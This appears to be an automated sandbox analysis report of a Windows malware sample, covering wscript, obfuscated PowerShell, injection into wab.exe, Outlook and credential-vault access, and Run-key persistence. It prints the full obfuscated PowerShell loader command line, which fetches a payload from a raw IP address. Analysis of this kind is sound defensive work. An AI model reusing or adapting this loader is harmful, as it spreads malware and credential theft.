        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Windows\SysWOW64\xcopy.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbV source: powershell.exe, 0000000B.00000002.2871144100.00000000074DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5T source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn[ source: powershell.exe, 0000000B.00000002.2871144100.00000000074AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, xcopy.exe
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2871144100.00000000074E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: xcopy.pdb source: wab.exe

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';", "0")
        Source: Yara match File source: 0000000B.00000002.2879459016.000000000CE4E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.2879301889.0000000008910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.2868524375.0000000005C62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fredsbevaegelse133)$global:Pelsdyrfarm = [System.Text.Encoding]::ASCII.GetString($Incoalescence)$global:Sildefiskerne=$Pelsdyrfarm.substring(319853,28417)<#ricin Prsenteret Slagterbn
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Stenksers $Reliefskrift $Indicatives), (Sleddings @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trktjers = [AppDomain]::CurrentDomain.GetAssemblies()$glo
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Egenlige)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Supporteres, $false).DefineType($feriekolonierne
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fredsbevaegelse133)$global:Pelsdyrfarm = [System.Text.Encoding]::ASCII.GetString($Incoalescence)$global:Sildefiskerne=$Pelsdyrfarm.substring(319853,28417)<#ricin Prsenteret Slagterbn
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD348C00BD pushad ; iretd 8_2_00007FFD348C00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD348C0A08 push E95B63D0h; ret 8_2_00007FFD348C09C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD348C0988 push E95B63D0h; ret 8_2_00007FFD348C09C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD349971C8 push esp; retf 8_2_00007FFD349971C9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0308333B pushfd ; retf 11_2_030833C1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030833AD pushad ; retf 11_2_030833B1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_076408D8 push eax; mov dword ptr [esp], ecx 11_2_07640AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0764B144 push 8B6BAABFh; iretd 11_2_0764B149
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_07640AB8 push eax; mov dword ptr [esp], ecx 11_2_07640AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08452AF5 push ebx; ret 11_2_08452B32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08452B41 push ebx; ret 11_2_08452B32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08452B63 push ebx; ret 11_2_08452B32
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_3_08975E1A push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_3_08975D31 push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_3_244A1BFF push eax; iretd 17_3_244A1C31
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_3_244AAF9A push ss; iretd 17_3_244AAFE1
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_3_0897839E push 8BFFFFFBh; retf 17_3_089783A3
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2481D4F2 push 0E0004C8h; retf 17_2_2481DA45
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_248127FA pushad ; ret 17_2_248127F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2481B008 push es; iretd 17_2_2481B009
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2481D82D push 0E0004C8h; retf 17_2_2481DA45
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24819939 push es; iretd 17_2_24819940
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2481283D push eax; iretd 17_2_24812858
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2481DA5A push 0E0004C8h; retf 17_2_2481DA45
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2481225F pushad ; ret 17_2_248127F9

        Boot Survival

        Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Achaque
        Source: C:\Windows\SysWOW64\xcopy.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJL
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
